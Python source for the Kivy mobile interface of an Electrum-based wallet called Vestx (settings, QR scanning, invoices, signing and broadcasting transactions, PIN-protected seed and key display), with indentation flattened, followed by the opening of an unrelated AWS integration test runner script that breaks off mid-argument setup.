chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'vestx':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
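    # Convert an amount string expressed in the current base unit into fiat, using the current exchange rate.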
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Current screen orientation. Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
#self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Vestx Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # Create triggers so that UI updates happen at most twice per second.
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_vestx.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('vestx:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_vestx.transaction import Transaction
from electrum_vestx.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_vestx.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_vestx.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.vestx.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_vestx/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
        '''Entry point of the Kivy UI.
        '''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for vestx: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# if self.network.tor_auto_on and not self.network.tor_on:
# self.show_tor_warning()
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def show_tor_warning(self):
from kivy.uix.button import Button
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
docs_uri = self.network.tor_docs_uri
def on_docs_press(a):
import webbrowser
webbrowser.open(docs_uri)
warn_box = GridLayout(rows=4, padding=20, spacing=20)
popup = Popup(title='Warning', title_align='center',
content=warn_box, auto_dismiss=False)
img_error = 'atlas://electrum_vestx/gui/kivy/theming/light/error'
warn_box.add_widget(Image(source=img_error, size_hint_y=0.1))
warn_box.add_widget(Label(text=self.network.tor_warn_msg,
text_size=(Window.size[0]-40-32, None)))
docs_btn = Button(text=self.network.tor_docs_title, size_hint_y=0.1)
warn_box.add_widget(docs_btn)
dismiss_btn = Button(text=_('Close'), size_hint_y=0.1)
warn_box.add_widget(dismiss_btn)
dismiss_btn.bind(on_press=popup.dismiss)
docs_btn.bind(on_press=on_docs_press)
popup.open()
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
if getattr(wallet.storage, 'backup_message', None):
self.show_info(wallet.storage.backup_message)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        '''Initialize the UI part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_vestx.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_vestx.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_vestx_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_vestx_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum_vestx/gui/icons/electrum-vestx.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
        # Once the GUI has been initialized, check whether anything needs to be
        # announced, since the callback may have fired before the GUI existed.
if self.receive_screen:
self.receive_screen.clear()
print('Hello tabs update')
#self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
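    # Refresh the balance / status text shown in the UI, depending on connection and synchronization state.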
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=10sp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=10sp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
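    # Estimate the maximum spendable amount by building a send-all transaction and subtracting any plugin-added extra fee.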
def get_max_amount(self):
from electrum_vestx.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
print('Hello tabs update') #self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Vestx Electrum', message,
app_icon=icon, app_name='Vestx Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_vestx/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_vestx/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Show an information bubble.

        :param text: message to be displayed
        :param pos: position of the bubble
        :param duration: time the bubble remains on screen; 0 = click to hide
        :param width: width of the bubble
        :param arrow_pos: arrow position of the bubble
        '''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_vestx/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
test_runner.py
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
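# Driver for the integration test suite: builds the pytest command line from the CLI
# options and runs the tests per region, either in parallel or sequentially.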
import datetime
import logging
import multiprocessing
import os
import sys
import time
import argparse
import pytest
from reports_generator import generate_json_report, generate_junitxml_merged_report
logger = logging.getLogger()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(module)s - %(message)s", level=logging.INFO)
START_TIME = time.time()
START_TIME_ISO = datetime.datetime.fromtimestamp(START_TIME).isoformat()
LOGS_DIR = "{0}.logs".format(START_TIME)
OUT_DIR = "{0}.out".format(START_TIME)
TEST_DEFAULTS = {
"parallelism": None,
"retry_on_failures": False,
"features": "", # empty string means all
"regions": [
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
"ca-central-1",
"eu-west-1",
"eu-west-2",
"eu-central-1",
"ap-southeast-1",
"ap-southeast-2",
"ap-northeast-1",
"ap-south-1",
"sa-east-1",
"eu-west-3",
],
"oss": ["alinux", "centos6", "centos7", "ubuntu1404", "ubuntu1604"],
"schedulers": ["sge", "slurm", "torque", "awsbatch"],
"instances": ["c4.xlarge", "c5.xlarge"],
"dry_run": False,
"reports": [],
"sequential": False,
"output_dir": "tests_outputs",
"custom_node_url": None,
"custom_cookbook_url": None,
"custom_template_url": None,
"custom_awsbatch_template_url": None,
"custom_awsbatchcli_url": None,
"custom_ami": None,
"vpc_stack": None,
"cluster": None,
"no_delete": False,
}
def _init_argparser():
parser = argparse.ArgumentParser(
description="Run integration tests suite.", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f",
"--features",
help="Run only tests for the listed features. Prepending the not keyword to the feature name causes the "
"feature to be excluded.",
default=TEST_DEFAULTS.get("features"),
nargs="+",
)
parser.add_argument(
"-r", "--regions", help="AWS region where tests are executed.", default=TEST_DEFAULTS.get("regions"), nargs="+"
)
parser.add_argument(
"-i", "--instances", help="AWS instances under test.", default=TEST_DEFAULTS.get("instances"), nargs="+"
)
parser.add_argument("-o", "--oss", help="OSs under test.", default=TEST_DEFAULTS.get("oss"), nargs="+")
parser.add_argument(
"-s", "--schedulers", help="Schedulers under test.", default=TEST_DEFAULTS.get("schedulers"), nargs="+"
)
parser.add_argument(
